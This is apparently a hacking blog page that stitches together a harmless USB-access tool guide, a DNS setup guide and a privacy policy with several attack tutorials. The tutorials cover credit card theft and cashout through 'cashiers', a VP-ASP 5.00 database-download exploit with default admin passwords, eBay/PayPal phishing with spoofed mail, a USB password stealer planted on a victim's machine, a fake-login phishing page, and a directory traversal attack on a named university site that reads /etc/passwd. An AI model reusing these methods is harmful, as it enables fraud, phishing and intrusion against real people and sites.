Paid To Popup Hacking Articles

How to Prevent data theft by USB stick

Occasionally, other users have access to your PC. You want to ensure that via foreign USB sticks no data is stolen or viruses are introduced. Therefore, you want to prohibit foreign access of USB flash drives without hindering your own work.

The freeware USB monitor from www.trinit-soft.de/usb-waechter ensures that the computer accepts only authorized USB sticks. All USB devices must first be registered, resulting in the administration of approved USB devices in the Microsoft Management Console. 

Open the site, click below in the download box on the link and save the file 'usbwaechter.exe' on the hard disk. To install, run the program and confirm appropriate safety warnings shown. Finally the 'USB switch administrator' that is available via the start enu immediately. Grant access through the UAC. The administration is involved as an object in the Microsoft Management Console.


The list of 'Permitted Devices' shows all USB devices that have been already used on the computer, as authorized. For future monitoring, the tool works automatically as a started system service. When connecting an external USB flash drives Windows first attempts to allow access through a brief installation of driver software.

This prevents the USB switch, so that the stick does not appear in Windows Explorer at first. If you need an access to a new USB flash drive, first start the USB switch. For this

  • Open and select ' Action I Add Device' and click ' Next' in the wizard. 
  • Then connect the USB device and wait for the display in the dialog box.
  •  Select the associated check boxes and press 'Next' and 'Finish'. 
  • The device is now available. 
You can delete the list entries. Right-click an element and select the context command ' Properties'. Further information will facilitate the identification of the correct USB device. A remote device is here but in the current session  is still usable, and is locked until the next boot

HACK CREDIT FOR FREE MONEY,HACK eBAY FOR FREE SHOPPING

Hi there. This is my first serious "black hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).

This tutorial is divided in two parts.

Introduction into Credit Cards
Credit card Hacking


Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:

Debit Card
Credit Card

1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :

First name
Last name
Address
City
State
Zip
Country
Phone
CC number
Expiry
CVV2 ( this is 3digit security code on backside after signature panel )

If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:

Credit Card Scams ( usually used for earning money , some times for shopping )
Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )

1. Shopadmin Hacking

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:

xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r

Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.


That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.

Hack password With USB - ( Usb steals passowrd)

Tweaked USB that steals every password including licenses.
Instructions
1.Download and Decompress the rar file and put all the files located in the folder “USBThief” into a USB. (You MUST put all from USBThief directory in main directory of usb, no folders no anything, just simply copy and paste)
2.Insert the USB in your victim’s computer.
3.View folder “dump” to see the passwords. It also makes a second dump folder in the batexe folder. Tested and Working perfectly!

Hacking email accounts with phishing or fake login pages password stealing

{.} Open www.jotform.com and Sign Up.
{.} then Login there with your newly registered account.
{.} now click on ‘ Create your first form’.
{.} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{.} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{.} Now Click on ‘Power Tool’ Option (In right hand side…)
{.} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{.} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{.} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{.} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{.} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{.} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{.} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{.} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it.

Now you can view it by typing the url in the address bar.

NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.

Name the login screen name like yahoo.com_mail_login.php?action=login&email=yes etc etc so that even if they look at the url, they don’t get suspicious, shorten your url with any short url provider
and give it some name that is similar to actual url.

lets suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url of the file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.


Now Place this website as home page at the victim’s computer, send him the link through email, trick them by saying that by using this site you can login fastly or without any problem etc and simply wait. If the user is not that much tech savvy for sure he is gonna end up prey to the login screen hacking.

See how simple is it constructing and set up a fake login screen and steal the password. Beware of such scam and be cautious while entering the password. Always look for the correct domain name while entering the password. Internet explorer 8 onwards will highlight the correct URL in a different color compared to other strings in URL.

If you are on a shared computer beware, the attacker can write in the windows host file and even make the URL as mail.yahoo.com.

Privacy Policy

If you require any more information or have any questions about our privacy policy, please feel free to contact us by email at raysha01@gmail.com.

At http://hackingarticles99.blogspot.com/, the privacy of our visitors is of extreme importance to us. This privacy policy document outlines the types of personal information is received and collected by http://hackingarticles99.blogspot.com/ and how it is used.

Log Files
Like many other Web sites, http://hackingarticles99.blogspot.com/ makes use of log files. The information inside the log files includes internet protocol ( IP ) addresses, type of browser, Internet Service Provider ( ISP ), date/time stamp, referring/exit pages, and number of clicks to analyze trends, administer the site, track user’s movement around the site, and gather demographic information. IP addresses, and other such information are not linked to any information that is personally identifiable.

Cookies and Web Beacons
http://hackingarticles99.blogspot.com/ does not use cookies.

DoubleClick DART Cookie
.:: Google, as a third party vendor, uses cookies to serve ads on http://hackingarticles99.blogspot.com/.
.:: Google's use of the DART cookie enables it to serve ads to users based on their visit to http://hackingarticles99.blogspot.com/ and other sites on the Internet.
.:: Users may opt out of the use of the DART cookie by visiting the Google ad and content network privacy policy at the following URL - http://www.google.com/privacy_ads.html

Some of our advertising partners may use cookies and web beacons on our site. Our advertising partners include ....
Google Adsense


These third-party ad servers or ad networks use technology to the advertisements and links that appear on http://hackingarticles99.blogspot.com/ send directly to your browsers. They automatically receive your IP address when this occurs. Other technologies ( such as cookies, JavaScript, or Web Beacons ) may also be used by the third-party ad networks to measure the effectiveness of their advertisements and / or to personalize the advertising content that you see.

http://hackingarticles99.blogspot.com/ has no access to or control over these cookies that are used by third-party advertisers.

You should consult the respective privacy policies of these third-party ad servers for more detailed information on their practices as well as for instructions about how to opt-out of certain practices. http://hackingarticles99.blogspot.com/'s privacy policy does not apply to, and we cannot control the activities of, such other advertisers or web sites.

If you wish to disable cookies, you may do so through your individual browser options. More detailed information about cookie management with specific web browsers can be found at the browsers' respective websites.

How to Setup Google DNS on your Computer


DNS settings are specified in the TCP/IP Properties window for the selected network connection. 
1.    Go the Control Panel.
2.    Click  Network Connection, and click Change adapter settings.

3.    Select the connection for which you want to configure Google Public DNS. For example:
o    To change the settings for an Ethernet connection, right-click Local Area Connection, and click Properties.
o    To change the settings for a wireless connection, right-click Wireless Network Connection, and click Properties.
4.    Select the Internet Protocol/TCP/IP tab. and then click Properties.

5.    Click Advanced and select the DNS tab. If there are any DNS server IP addresses listed there, write them down for future reference, and remove them from this window.
6.    Click OK.
7.    Select Use the following DNS server addresses. If there are any IP addresses listed in the Preferred DNS server or Alternate DNS server, write them down for future reference.
8.    Replace those addresses with the IP addresses of the Google DNS servers: 8.8.8.8 and 8.8.4.4.

9.    Restart the connection you selected

Hack a website using Directory Transversal attack?(taking www.chitkara.edu.in)


What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is placed in root directory. The visitor can not step out of root directory.


what does ../ or ..\ (dot dot slash) mean ?

The ..\ instructs the system to go one directory up. For example, we are at this location C:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.



Again on typing ..\ , we would rech at C:\xx .

Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack


http://www.chitkara.edu.in/




This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin placed in 'etc' directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.




We do not know the actual names and contents of directories except 'etc' which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd


This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd


Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd


It takes us 5 directories up to the main drive and then to 'etc' directory and show us contents of 'passwd' file.

To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format




You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on server which is called as Local File Inclusion.
..
Regards:---- Anshuman kak a Script Kiddie.....